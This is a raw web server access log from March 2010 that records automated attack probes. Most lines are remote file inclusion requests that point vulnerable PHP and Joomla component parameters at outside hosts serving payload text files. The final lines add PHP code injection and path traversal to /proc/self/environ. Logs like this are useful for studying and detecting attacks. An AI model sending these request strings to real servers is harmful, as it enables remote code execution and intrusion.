123.143.29.250 - - [01/Mar/2010:06:33:38 -0800] "GET ///bbs///////write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:06:33:39 -0800] "GET /logs/access_100210.log%20%20////bbs///////write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:06:33:39 -0800] "GET /logs////bbs///////write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [01/Mar/2010:06:33:54 -0800] "GET /logs/access_100129.log%20%20/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:06:33:56 -0800] "GET /logs/access_100204.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:06:34:05 -0800] "GET /logs/access_100204.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [01/Mar/2010:06:35:19 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [01/Mar/2010:06:35:19 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [01/Mar/2010:06:35:19 -0800] "GET /logs/access.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:06:35:19 -0800] "GET /logs/access_100203.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:06:35:28 -0800] "GET /logs/access_100203.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
186.28.232.13 - - [01/Mar/2010:06:36:05 -0800] "GET /logs//administrator/index3.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.237.78.176 - - [01/Mar/2010:06:36:25 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [01/Mar/2010:06:36:25 -0800] "GET /logs/access.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [01/Mar/2010:06:36:25 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
186.28.232.13 - - [01/Mar/2010:06:36:35 -0800] "GET /logs/access_100123.log//administrator/index3.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:06:38:25 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:06:38:25 -0800] "GET /logs/access_100211.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:06:38:26 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:06:39:06 -0800] "GET /logs/access_100204.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:06:40:07 -0800] "GET /logs/access_100215.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
222.237.78.176 - - [01/Mar/2010:06:40:13 -0800] "GET /logs/access.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [01/Mar/2010:06:40:13 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [01/Mar/2010:06:40:13 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [01/Mar/2010:06:40:26 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:06:40:36 -0800] "GET /components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:06:40:36 -0800] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:06:40:36 -0800] "GET /logs/access_100217.log%20%20//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:06:41:24 -0800] "GET /components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:06:41:24 -0800] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:06:41:25 -0800] "GET /logs/access_100217.log%20%20//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [01/Mar/2010:06:41:50 -0800] "GET /logs/access_100123.log//administrator/index3.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
195.190.166.35 - - [01/Mar/2010:06:41:50 -0800] "GET /administrator/index3.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
195.190.166.35 - - [01/Mar/2010:06:41:50 -0800] "GET /logs//administrator/index3.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
186.28.232.13 - - [01/Mar/2010:06:42:06 -0800] "GET /logs/access_100125.log//administrator/index3.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
195.190.166.35 - - [01/Mar/2010:06:43:03 -0800] "GET /logs/access_100130.log//administrator/index3.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:06:43:40 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:06:43:40 -0800] "GET /logs/access_100219.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:06:43:40 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:06:43:40 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:06:43:40 -0800] "GET /logs/access_100219.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:06:43:41 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:06:43:47 -0800] "GET /logs/access_100214.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:06:43:48 -0800] "GET /logs/access_100214.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [01/Mar/2010:06:44:25 -0800] "GET /logs/access_100130.log%20//administrator/index3.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:06:45:29 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:06:45:29 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:06:45:30 -0800] "GET /logs/access_100219.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:06:45:39 -0800] "GET /logs/access_100214.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [01/Mar/2010:06:46:41 -0800] "GET /logs///admin/classes/TplLoad.php?full_path_to_public_program=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:06:46:46 -0800] "GET /logs//components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:06:46:46 -0800] "GET /components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:06:46:46 -0800] "GET /logs/access_100204.log%20%20//components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:06:46:54 -0800] "GET /components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:06:46:54 -0800] "GET /logs/access_100204.log%20%20//components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:06:46:54 -0800] "GET /logs//components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [01/Mar/2010:06:48:43 -0800] "GET /logs///nullpo/hsList.php?subdir=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:06:49:08 -0800] "GET /logs/access_100219.log//components/com_performs/performs.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:06:49:08 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:06:49:08 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:06:49:54 -0800] "GET /logs/access_100125.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:06:50:40 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:06:50:40 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:06:50:40 -0800] "GET /logs/access_100219.log//components/com_performs/performs.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:06:52:08 -0800] "GET /components/com_remository/com_remository_constants.php?mosConfig.absolute.path=http://sawan.or.kr/SESSION/test.pl?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:06:52:08 -0800] "GET /logs//components/com_remository/com_remository_constants.php?mosConfig.absolute.path=http://sawan.or.kr/SESSION/test.pl?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.puaga.com"
212.241.177.123 - - [01/Mar/2010:06:52:34 -0800] "GET /components/com_fabrik/libs/Blowfish/PHP.php?mosConfig.absolute.path=http://sawan.or.kr/SESSION/test.pl?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.puaga.com"
212.241.177.123 - - [01/Mar/2010:06:52:35 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/PHP.php?mosConfig.absolute.path=http://sawan.or.kr/SESSION/test.pl?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.puaga.com"
60.251.165.181 - - [01/Mar/2010:06:53:09 -0800] "GET /http://keycarsales.com/css/templates/target.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
64.15.158.246 - - [01/Mar/2010:06:53:51 -0800] "GET /logs/access_100201.log//components/com_forum/download.php?phpbb_root_path=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [01/Mar/2010:06:53:51 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [01/Mar/2010:06:53:51 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.101.241.159 - - [01/Mar/2010:06:54:41 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
75.101.241.159 - - [01/Mar/2010:06:54:41 -0800] "GET /orange_g/forum/viewtopic.php?p=27531 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
64.15.158.246 - - [01/Mar/2010:06:55:18 -0800] "GET /logs/access_100201.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [01/Mar/2010:06:55:42 -0800] "GET /logs/access_100211.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:06:55:48 -0800] "GET /logs/access_100125.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:06:56:11 -0800] "GET /logs/access_100202.log%20%20////bbs///////write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [01/Mar/2010:06:57:02 -0800] "GET /logs/access_100219.log/http://keycarsales.com/css/templates/target.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
60.251.165.181 - - [01/Mar/2010:06:57:03 -0800] "GET /http://keycarsales.com/css/templates/target.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
60.251.165.181 - - [01/Mar/2010:06:57:04 -0800] "GET /logs/http://keycarsales.com/css/templates/target.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
95.131.66.198 - - [01/Mar/2010:06:57:57 -0800] "GET /logs//tools/day.php?includedir=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:06:58:39 -0800] "GET /logs/access_100211.log%20%20///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:06:58:39 -0800] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:06:58:40 -0800] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:06:58:52 -0800] "GET /logs/access_100204.log%20%20///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:59:19 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:59:19 -0800] "GET /logs/access_100210.log%20%20//write_comment_update.php?board_skin_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:59:19 -0800] "GET /write_comment_update.php?board_skin_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.101.241.159 - - [01/Mar/2010:06:59:40 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
75.101.241.159 - - [01/Mar/2010:06:59:40 -0800] "GET /orange_g/forum/viewtopic.php?p=27564 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
64.15.158.246 - - [01/Mar/2010:07:02:04 -0800] "GET /logs/access_100211.log//components/com_forum/download.php?phpbb_root_path=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [01/Mar/2010:07:02:23 -0800] "GET /logs/access_100202.log%20%20//tools/day.php?includedir=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [01/Mar/2010:07:02:27 -0800] "GET /logs//tools/day.php?includedir=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [01/Mar/2010:07:02:27 -0800] "GET /tools/day.php?includedir=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.30.180.99 - - [01/Mar/2010:07:03:05 -0800] "GET /logs/access_100213.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
217.30.180.99 - - [01/Mar/2010:07:03:05 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
217.30.180.99 - - [01/Mar/2010:07:03:05 -0800] "GET /logs/access_100213.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
217.30.180.99 - - [01/Mar/2010:07:03:05 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
217.30.180.99 - - [01/Mar/2010:07:03:06 -0800] "GET /logs/access_100213.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
217.30.180.99 - - [01/Mar/2010:07:03:06 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
